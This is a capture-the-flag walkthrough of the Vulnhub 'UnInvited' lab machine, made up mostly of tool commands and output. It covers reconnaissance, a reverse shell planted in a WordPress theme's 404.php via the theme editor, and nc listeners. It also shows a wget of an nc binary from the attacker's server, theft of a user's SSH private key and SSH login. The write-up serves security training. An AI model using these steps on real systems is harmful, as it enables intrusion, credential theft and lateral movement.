UnInvited
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:06 1 60 Unknown vendor
192.168.56.100 08:00:27:b2:b4:d3 1 60 PCS Systemtechnik GmbH
192.168.56.146 08:00:27:ab:59:15 1 60 PCS Systemtechnik GmbH
Using netdiscover on Kali Linux, the target host's IP address is identified as 192.168.56.146.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.146 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-03 22:55 EST
Nmap scan report for localhost (192.168.56.146)
Host is up (0.00011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: SEC-CORP
7894/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 afd242e431ff4ffb0bde18e93fc4bc42 (RSA)
| 256 97564740ea99b2a61aa559567e2bb4a0 (ECDSA)
|_ 256 b2b1674475f6d832a2f2ff7f09a77d53 (ED25519)
60000/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: UNINVITED
MAC Address: 08:00:27:AB:59:15 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.08 seconds
The nmap results show three open ports on the target: 80 (http), 7894 (ssh) and 60000 (http), with a WordPress 5.4.2 site on port 60000. Note that the two Apache banners differ (2.4.29 on Ubuntu on port 80 versus 2.4.38 on Debian on port 60000), which already suggests the WordPress site is served from a separate system, such as a container.
Getting a shell
Browsing to port 80 from Kali and viewing the page source shows a commented-out string; decoding it:
</footer>
<!-- Footer section end -->
<!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=-->
<!--====== Javascripts & Jquery ======-->
<script src="js/jquery-3.2.1.min.js"></script>
<script src="js/bootstrap.min.js"></script>
<script src="js/owl.carousel.min.js"></script>
<script src="js/jquery.magnific-popup.min.js"></script>
<script src="js/circle-progress.min.js"></script>
<script src="js/main.js"></script>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=' | base64 -d
Yeah! I know it happens... I guess u might want to add this [fieldforce] to your hosts
So a hosts entry for fieldforce is needed:
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.146 fieldforce
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ curl http://192.168.56.146/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.146 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.146
+ Target Hostname: 192.168.56.146
+ Target Port: 80
+ Start Time: 2023-03-03 23:03:13 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: 34af, size: 5abb5cae20433, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2023-03-03 23:04:02 (GMT-5) (49 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ gobuster dir -u http://192.168.56.146 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt,.sh
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.146
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,sh,php,html
[+] Timeout: 10s
===============================================================
2023/03/03 23:04:55 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/about.html (Status: 200) [Size: 11039]
/contact.html (Status: 200) [Size: 7902]
/blog.html (Status: 200) [Size: 8621]
/img (Status: 301) [Size: 314] [--> http://192.168.56.146/img/]
/index.html (Status: 200) [Size: 13487]
/service.html (Status: 200) [Size: 13090]
/css (Status: 301) [Size: 314] [--> http://192.168.56.146/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.146/js/]
/elements.html (Status: 200) [Size: 13628]
/Source (Status: 301) [Size: 317] [--> http://192.168.56.146/Source/]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1098491 / 1102805 (99.61%)===============================================================
2023/03/03 23:06:58 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ nikto -h http://192.168.56.146:60000
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.146
+ Target Hostname: 192.168.56.146
+ Target Port: 60000
+ Start Time: 2023-03-03 23:08:26 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ Retrieved x-powered-by header: PHP/7.4.8
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://192.168.56.146:60000/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Uncommon header 'link' found, with contents: <http://fieldforce:60000/wp-json/>; rel="https://api.w.org/"
+ Entry '/wp-admin/' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/wp-admin/admin-ajax.php' in robots.txt returned a non-forbidden or redirect HTTP code (400)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3092: /backdoor/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /server-status: Apache server-status interface found (protected/forbidden)
+ 7923 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2023-03-03 23:10:42 (GMT-5) (136 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to [email protected]) (y/n)?
The scan of port 60000 turned up /backdoor/, but it is just the WordPress login page (the wps-hide-login plugin identified below moves wp-login.php to a custom slug such as this one).
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar 3 23:13:17 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.146:60000/backdoor/e442977.html, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Mar 3 23:13:19 2023
[+] Requests Done: 51
[+] Cached Requests: 8
[+] Data Sent: 14.547 KB
[+] Data Received: 243.427 KB
[+] Memory used: 224.445 MB
[+] Elapsed time: 00:00:02
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000/backdoor/ -e u,p --wp-content-dir /wp-content --plugins-detection mixed
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/backdoor/ [192.168.56.146]
[+] Started: Fri Mar 3 23:14:00 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.146:60000/backdoor/1688692.html, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Most Popular Plugins (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:21 <============================================> (1500 / 1500) 100.00% Time: 00:00:21
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://192.168.56.146:60000/wp-content/plugins/akismet/
| Latest Version: 5.0.1
| Last Updated: 2022-11-08T05:36:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] wps-hide-login
| Location: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/
| Last Updated: 2022-05-25T13:06:00.000Z
| Readme: http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
| [!] The version is out of date, the latest version is 1.9.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/, status: 403
|
| Version: 1.5.6 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.146:60000/wp-content/plugins/wps-hide-login/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Mar 3 23:14:24 2023
[+] Requests Done: 1519
[+] Cached Requests: 51
[+] Data Sent: 453.51 KB
[+] Data Received: 521.992 KB
[+] Memory used: 270.008 MB
[+] Elapsed time: 00:00:23
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ wpscan --url http://192.168.56.146:60000 -e u
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://192.168.56.146:60000/ [192.168.56.146]
[+] Started: Sat Mar 4 00:07:24 2023
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.38 (Debian)
| - X-Powered-By: PHP/7.4.8
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.146:60000/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.146:60000/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.146:60000/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.146:60000/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Emoji Settings (Passive Detection)
| - http://192.168.56.146:60000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.4.2'
| Confirmed By: Meta Generator (Passive Detection)
| - http://192.168.56.146:60000/, Match: 'WordPress 5.4.2'
[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] elliot
| Found By: Wp Json Api (Aggressive Detection)
| - http://192.168.56.146:60000/wp-json/wp/v2/users/?per_page=100&page=1
[+] Elliot
| Found By: Rss Generator (Aggressive Detection)
[+] 1
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Mar 4 00:07:35 2023
[+] Requests Done: 46
[+] Cached Requests: 5
[+] Data Sent: 12.027 KB
[+] Data Received: 282.581 KB
[+] Memory used: 145.406 MB
[+] Elapsed time: 00:00:11
This scan found the user name elliot.
The password is a word taken from the site's content: wh1ter0se.
Building a wordlist from the site with cewl did not produce this password, which is a bit odd.
After logging in, the first attempt was to edit the 404.php template of the active theme through the theme editor, but the update returned an error.
A second approach works: still in the theme editor, select a different theme on the right (one that is not activated), replace the contents of its 404.php with the code of shell.php, and click Update File; this time no error is returned.
Then request that theme's 404.php directly.
Summary: the active WordPress theme on this box is nanospace, and editing 404.php under it fails. There is no need to actually switch themes: in "Select theme to edit:" at the top right, choose any other theme, Twenty Nineteen in this case, edit its 404.php, and the update succeeds. The URL used to trigger the payload must then point at the Twenty Nineteen theme directory. The most likely reason the active theme refuses the edit is that, since WordPress 5.2, the file editor makes a loopback request to the site URL after changing a file of the active theme (or an active plugin) and reverts the change when that request fails; from inside the container the site URL http://fieldforce:60000 cannot be resolved, whereas files of inactive themes are written without that check.
fieldforce:60000/wp-content/themes/twentynineteen/404.php
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.146] 48992
Linux f950b9c50e1d 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64 GNU/Linux
06:06:22 up 2:27, 0 users, load average: 3.31, 3.54, 3.46
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@f950b9c50e1d:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@f950b9c50e1d:/$
www-data@f950b9c50e1d:/$ ifconfig
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.3 netmask 255.255.0.0 broadcast 172.18.255.255
ether 02:42:ac:12:00:03 txqueuelen 0 (Ethernet)
RX packets 16616729 bytes 18729729659 (17.4 GiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 17075528 bytes 2087397916 (1.9 GiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 2488485 bytes 130686616 (124.6 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2488485 bytes 130686616 (124.6 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
www-data@f950b9c50e1d:/$
The shell obtained so far is evidently inside a container: the hostname is a Docker-style hex ID and eth0 sits on 172.18.0.3/16 rather than on the 192.168.56.0/24 network scanned earlier.
www-data@f950b9c50e1d:/home/demodocker/.local$ ls -alh
ls -alh
total 16K
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 29 2020 .
drwxr-xr-x 3 demodocker demodocker 4.0K Jul 30 2020 ..
-rw-r--r-- 1 demodocker demodocker 57 Jul 29 2020 note.txt
drwx------ 3 demodocker demodocker 4.0K Jul 28 2020 share
www-data@f950b9c50e1d:/home/demodocker/.local$ cat note.txt
cat note.txt
ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs' | base64 -d
encoded twice LS0taXAtLS0vZnNvY2lldHkuZXhl
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ echo 'LS0taXAtLS0vZnNvY2lldHkuZXhl' | base64 -d
---ip---/fsociety.exe
This indicates that fsociety.exe is at http://192.168.56.146/fsociety.exe; download it to a Windows machine and run it.
User name to enter: elliot, password: mrrobot (the word appears on the website, but honestly this is a stretch).
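Both hints on this box (the base64 comment on port 80 and the "encoded twice" note.txt) are peeled by the same routine below. This is an added example, not part of the original write-up; the HTML fragment is constructed from the comment shown on the page, and the IP used for the hosts line is the one nmap reported.

```python
"""Added example: pull HTML comments out of a page and peel base64 layers off
any token found inside them, until the result is no longer base64."""
import base64
import binascii
import re

COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
# A candidate token: base64 alphabet only, reasonably long, optional padding.
TOKEN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def html_comments(html):
    """Return the text of every <!-- ... --> comment, stripped."""
    return [c.strip() for c in COMMENT_RE.findall(html)]


def try_b64(token):
    """Decode one token; return text only if it is valid base64 AND printable UTF-8."""
    if len(token) % 4:
        return None
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() and text.strip() else None


def decode_layers(text, max_depth=5):
    """Replace the first decodable base64 token with its plaintext, repeatedly.
    Returns the chain [layer0, layer1, ...]; stops when nothing decodes."""
    chain = [text]
    for _ in range(max_depth):
        decoded = None
        for tok in TOKEN_RE.findall(chain[-1]):
            decoded = try_b64(tok)
            if decoded is not None:
                break
        if decoded is None:
            break
        chain.append(decoded)
    return chain


def hosts_entry(ip, hint):
    """Turn 'add this [name] to your hosts' into an /etc/hosts line, or None."""
    m = re.search(r"\[([A-Za-z0-9.-]+)\]", hint)
    return f"{ip} {m.group(1)}" if m else None


def decode_page_comments(html, ip):
    """Decode every comment on a page; pair each final layer with a hosts hint if any."""
    results = []
    for comment in html_comments(html):
        chain = decode_layers(comment)
        results.append((chain[-1], hosts_entry(ip, chain[-1])))
    return results


# Constructed page fragment: the real comment from port 80 plus two harmless ones.
SAMPLE_HTML = """
<!-- Footer section end -->
<!--WWVhaCEgSSBrbm93IGl0IGhhcHBlbnMuLi4gSSBndWVzcyB1IG1pZ2h0IHdhbnQgdG8gYWRkIHRoaXMgW2ZpZWxkZm9yY2VdIHRvIHlvdXIgaG9zdHM=-->
<!--====== Javascripts & Jquery ======-->
"""
NOTE_TXT = "ZW5jb2RlZCB0d2ljZSBMUzB0YVhBdExTMHZabk52WTJsbGRIa3VaWGhs"

if __name__ == "__main__":
    for plain, hosts in decode_page_comments(SAMPLE_HTML, "192.168.56.146"):
        print(plain, "->", hosts)
    print(" -> ".join(decode_layers(NOTE_TXT)))
```

The printable-UTF-8 check is what keeps this from "decoding" ordinary long words that happen to be a multiple of four characters; binary-looking output is treated as a miss and the chain stops, which is the conservative choice for a hint hunter.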
www-data@f950b9c50e1d:/$ which nc
which nc
www-data@f950b9c50e1d:/$
There is no nc on the target, so fetch one from Kali Linux.
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ cp /usr/bin/nc .
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ls -alh
total 2.9M
drwxr-xr-x 5 kali kali 4.0K Mar 4 04:05 .
drwxr-xr-x 26 kali kali 4.0K Mar 3 22:52 ..
drwxr-xr-x 6 kali kali 4.0K Jun 5 2017 Magnific-Popup-master
-rw-r--r-- 1 kali kali 339K Mar 3 23:05 Magnific-Popup-master.zip
drwxr-xr-x 7 kali kali 4.0K Mar 4 00:40 nanospace
-rw-r--r-- 1 kali kali 1.7M Mar 4 00:41 nanospace1.zip
-rwxr-xr-x 1 kali kali 35K Mar 4 04:05 nc
-rw-r--r-- 1 root root 1.2K Mar 3 22:55 nmap_full_scan
drwxr-xr-x 7 kali kali 4.0K Apr 20 2018 OwlCarousel2-2.3.4
-rw-r--r-- 1 kali kali 774K Mar 3 23:05 OwlCarousel2-2.3.4.zip
-rwx------ 1 kali kali 5.4K Mar 4 00:21 shell.php
-rw-r--r-- 1 kali kali 2.4K Mar 4 00:26 shell.zip
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ python -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
www-data@f950b9c50e1d:/tmp$ wget http://192.168.56.206:8000/nc
wget http://192.168.56.206:8000/nc
--2023-03-04 09:05:46-- http://192.168.56.206:8000/nc
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 34952 (34K) [application/octet-stream]
Saving to: ‘nc’
nc 100%[===================>] 34.13K --.-KB/s in 0s
2023-03-04 09:05:46 (853 MB/s) - ‘nc’ saved [34952/34952]
www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root root 4.0K Mar 4 09:05 .
drwxr-xr-x 1 root root 4.0K Jul 28 2020 ..
-rw-rw-rw- 1 www-data www-data 35K Mar 4 09:05 nc
drwxr-xr-x 5 root root 4.0K Jul 23 2020 pear
www-data@f950b9c50e1d:/tmp$ chmod 777 nc
chmod 777 nc
According to the hint, when the IP is 172.18.0.3, nc should listen on port 8888. Something on the Docker host side (172.18.0.1) then connects in, and the resulting shell runs as docksec:
www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...
www-data@f950b9c50e1d:/tmp$ ./nc -nlvp 8888
./nc -nlvp 8888
listening on [any] 8888 ...
connect to [172.18.0.3] from (UNKNOWN) [172.18.0.1] 54482
id
id
uid=1001(docksec) gid=1001(docksec) groups=1001(docksec)
/home/docksec> ls -alh
ls -alh
total 52K
drwxr-xr-x 7 docksec docksec 4.0K Jul 30 2020 .
drwxr-xr-x 4 root root 4.0K Jul 28 2020 ..
-rw------- 1 docksec docksec 1.1K Jul 30 2020 .bash_history
-rw-r--r-- 1 docksec docksec 220 Jul 28 2020 .bash_logout
-rw-r--r-- 1 docksec docksec 3.7K Jul 28 2020 .bashrc
drwx------ 2 docksec docksec 4.0K Jul 29 2020 .cache
drwx------ 3 docksec docksec 4.0K Jul 29 2020 .gnupg
drwxrwxr-x 3 docksec docksec 4.0K Jul 28 2020 .local
-rw-r--r-- 1 docksec docksec 807 Jul 28 2020 .profile
drwx------ 2 docksec docksec 4.0K Jul 29 2020 .secret
-rw-rw-r-- 1 docksec docksec 66 Jul 29 2020 .selected_editor
drwx------ 2 docksec docksec 4.0K Jul 29 2020 .ssh
-r-------- 1 docksec docksec 318 Jul 28 2020 user1.txt
/home/docksec> cat user1.txt
cat user1.txt
_______ __ __ ___ ___ _______
| | |_| | | | | |
| _____| | | | | ___|
| |_____| | | | | |___
|_____ | | | |___| ___|
_____| | ||_|| | | | |___
|_______|_| |_|___|_______|_______|
FLAG{DASDGFGPXLCKDEG5D7635CSDAFDIMMJDSUWEQDSADIG}
/home/docksec> cd .ssh
cd .ssh
www-data@f950b9c50e1d:/tmp$ ls -alh
ls -alh
total 48K
drwxrwxrwt 1 root root 4.0K Mar 4 09:05 .
drwxr-xr-x 1 root root 4.0K Jul 28 2020 ..
-rwxrwxrwx 1 www-data www-data 35K Mar 4 09:05 nc
drwxr-xr-x 5 root root 4.0K Jul 23 2020 pear
www-data@f950b9c50e1d:/tmp$
/home/docksec> cat ./.ssh/id_rsa
cat ./.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----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-----END RSA PRIVATE KEY-----
/home/docksec>
┌──(kali㉿kali)-[~/Vulnhub/UnInvited]
└─$ ssh -i id_rsa [email protected] -p 7894
The authenticity of host '[192.168.56.146]:7894 ([192.168.56.146]:7894)' can't be established.
ED25519 key fingerprint is SHA256:TDHE9jZRgNWTCsD16WZXDrJFcTVA6M9yWrX7pXR0VyY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.146]:7894' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-20-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sat Mar 4 14:46:34 IST 2023
System load: 0.0
Usage of /: 1.3% of 313.03GB
Memory usage: 35%
Swap usage: 0%
Processes: 128
Users logged in: 0
IP address for enp0s3: 192.168.56.146
IP address for docker0: 172.17.0.1
IP address for br-3a300780bc7a: 172.18.0.1
=> There is 1 zombie process.
287 packages can be updated.
176 updates are security updates.
#########################################################
____ ____ __ ________ .___
__ __ ____/_ | _______ _/_ |/ |\_____ \ __| _/
| | \/ \| |/ \ \/ /| \ __\_(__ < / __ |
| | / | \ | | \ / | || | / \/ /_/ |
|____/|___| /___|___| /\_/ |___||__|/______ /\____ |
